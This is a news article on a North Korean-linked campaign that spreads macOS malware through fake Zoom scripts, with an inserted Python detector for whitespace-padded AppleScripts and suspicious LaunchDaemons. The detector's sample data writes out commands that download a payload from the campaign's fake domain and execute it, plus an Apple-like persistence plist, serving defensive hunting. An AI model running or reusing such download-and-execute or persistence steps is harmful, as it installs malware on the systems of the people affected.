- Fake Zoom scripts launch malware hidden beneath thousands of lines of whitespace
- LaunchDaemons ensure the malware runs at startup with administrator privileges once installed
- Malicious components are disguised as legitimate tools such as "iCloud_helper" and "Wi-Fi Updater"
A new cyber campaign that uses fake Zoom applications is targeting organizations in North America, Europe and the Asia-Pacific region, experts have warned.
The campaign, linked to North Korean hackers, is attributed to the BlueNoroff group, a well-known affiliate of the notorious Lazarus Group, and spoofs Zoom's legitimate video conferencing service to fool victims.
Primarily focused on the gaming, entertainment and fintech sectors, the operation appears carefully coordinated and aims to compromise cryptocurrency holdings and other sensitive financial data.
How the attack works
The operation begins with a deceptive AppleScript designed to look as if it is performing routine Zoom SDK maintenance.
Analysts found the script padded with roughly 10,000 empty lines to hide the malicious commands buried deep inside.
Those commands, found on lines 10,017 and 10,018, use a curl request to silently download malware from a counterfeit domain: ZOOM-TECH[.]us.
Once installed, the malware embeds itself in the system using LaunchDaemon configurations that execute the malicious payload at startup with elevated privileges.
Additional components are then retrieved from compromised infrastructure and disguised as normal macOS tools such as "iCloud_helper" and "Wi-Fi Updater."
These components wipe temporary files and staging folders using anti-forensic techniques to avoid detection, while maintaining backdoor access for remote commands and data theft.
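The two artifacts described above, a whitespace-padded AppleScript that shells out to curl and a LaunchDaemon plist that relaunches the dropped binary at boot, lend themselves to simple host-side hunting. The following Python is an added example, not code from the article, from Zoom or from any vendor. The padding threshold, the Zoom-only domain allowlist, the "user-writable path" list, the sample script, the drop path `/tmp/icloud_helper` and the plist label are all assumptions constructed for the demonstration; the domain string is only matched against, never contacted.

```python
"""Hunting heuristics for padded AppleScript droppers and suspicious LaunchDaemons.

Added example: thresholds, allowlist, paths and samples are assumptions, not
indicators published with the article.
"""
import plistlib
import re
from typing import Dict, List

PAD_THRESHOLD = 500                  # assumption: no real script has 500+ consecutive blank lines
KNOWN_GOOD_DOMAINS = {"zoom.us"}     # assumption: only the genuine Zoom domain is expected
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/")  # assumption
DOWNLOADER_TOKENS = ("curl ", "osascript", "bash -c", "sh -c")

SHELL_RE = re.compile(r'do shell script\s+"([^"]*)"', re.IGNORECASE)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def is_known_good(host: str) -> bool:
    """True only for the allowlisted domain or its subdomains (zoom-tech.us does not match)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in KNOWN_GOOD_DOMAINS)


def analyze_applescript(text: str) -> Dict:
    """Locate `do shell script` commands, count the blank lines hiding each one,
    and list any hosts they contact that are not on the allowlist."""
    lines = text.splitlines()
    blank_run = longest_run = 0
    findings: List[Dict] = []
    for lineno, line in enumerate(lines, start=1):
        if not line.strip():
            blank_run += 1
            longest_run = max(longest_run, blank_run)
            continue
        m = SHELL_RE.search(line)
        if m:
            cmd = m.group(1)
            unknown = [h for h in HOST_RE.findall(cmd) if not is_known_good(h)]
            findings.append({"line": lineno, "blank_lines_before": blank_run,
                             "command": cmd, "unknown_hosts": unknown})
        blank_run = 0  # a non-blank line ends the current run of padding
    return {"total_lines": len(lines), "longest_blank_run": longest_run,
            "padded": longest_run >= PAD_THRESHOLD, "findings": findings}


def analyze_launchdaemon(plist_bytes: bytes) -> Dict:
    """Flag a launchd job that runs at boot from a user-writable path or that
    shells out to a downloader/interpreter. RunAtLoad alone is normal for daemons."""
    job = plistlib.loads(plist_bytes)
    args = list(job.get("ProgramArguments", []))
    if "Program" in job:
        args.insert(0, job["Program"])
    reasons: List[str] = []
    if job.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    if job.get("KeepAlive"):
        reasons.append("KeepAlive")
    if any(a.startswith(WRITABLE_PREFIXES) for a in args):
        reasons.append("program in user-writable path")
    if any(tok in " ".join(args) for tok in DOWNLOADER_TOKENS):
        reasons.append("shell/downloader in arguments")
    suspicious = ("program in user-writable path" in reasons
                  or "shell/downloader in arguments" in reasons)
    return {"label": job.get("Label"), "args": args,
            "reasons": reasons, "suspicious": suspicious}


# Constructed sample: a "maintenance" header, 10,000 blank lines, then the real payload.
SAMPLE_SCRIPT = (
    "-- Zoom SDK maintenance helper (constructed sample, not the real dropper)\n"
    'display dialog "Checking Zoom SDK..."\n'
    + "\n" * 10000 +
    'do shell script "curl -s https://zoom-tech.us/update -o /tmp/icloud_helper"\n'
    'do shell script "chmod +x /tmp/icloud_helper && /tmp/icloud_helper &"\n'
)

# Constructed sample plists: one mimicking the disguised persistence, one benign.
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.apple.icloud.helper",        # assumed label, chosen to look Apple-like
    "ProgramArguments": ["/tmp/icloud_helper"],  # assumed drop path
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.agent",
    "ProgramArguments": ["/usr/libexec/example-agent", "--daemon"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    report = analyze_applescript(SAMPLE_SCRIPT)
    print("padded:", report["padded"], "longest run:", report["longest_blank_run"])
    for f in report["findings"]:
        print(f"line {f['line']} after {f['blank_lines_before']} blank lines: "
              f"{f['command']}  unknown hosts={f['unknown_hosts']}")
    for name, blob in (("sample", SAMPLE_PLIST), ("benign", BENIGN_PLIST)):
        print(name, analyze_launchdaemon(blob))
```

In production the same functions would be pointed at every `.scpt`/`.applescript` a user has recently opened and at `/Library/LaunchDaemons` and `/Library/LaunchAgents`; the blank-line count is the cheap first filter, and any `do shell script` that reaches a host outside your allowlist, or any daemon whose program lives under `/tmp` or a home directory, is worth an analyst's time regardless of what the label claims to be.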
This approach exploits the now-common work-from-home scenario, where technical glitches are resolved quickly and often with minimal scrutiny.
The malware goes beyond simple credential theft: it actively hunts for cryptocurrency wallet extensions, browser logins and authentication keys, confirming BlueNoroff's continued focus on financial gain.
In one documented case, a Canadian online gaming company was targeted on May 28, when attackers used fake Zoom troubleshooting scripts to plant malware.
To stay safe, verify Zoom meeting invitations and participants independently, block suspicious domains and use endpoint protection, because attackers are now abusing trusted platforms and familiar workflows to slip past basic defenses.
It is also important to choose strong antivirus and ransomware protection software, especially for organizations with digital assets or crypto teams.
Companies should adopt identity theft protection to monitor exposed data and credentials, educate staff about social engineering risks and secure cryptocurrency tools with hardware wallets.
Via Cybersecuritynews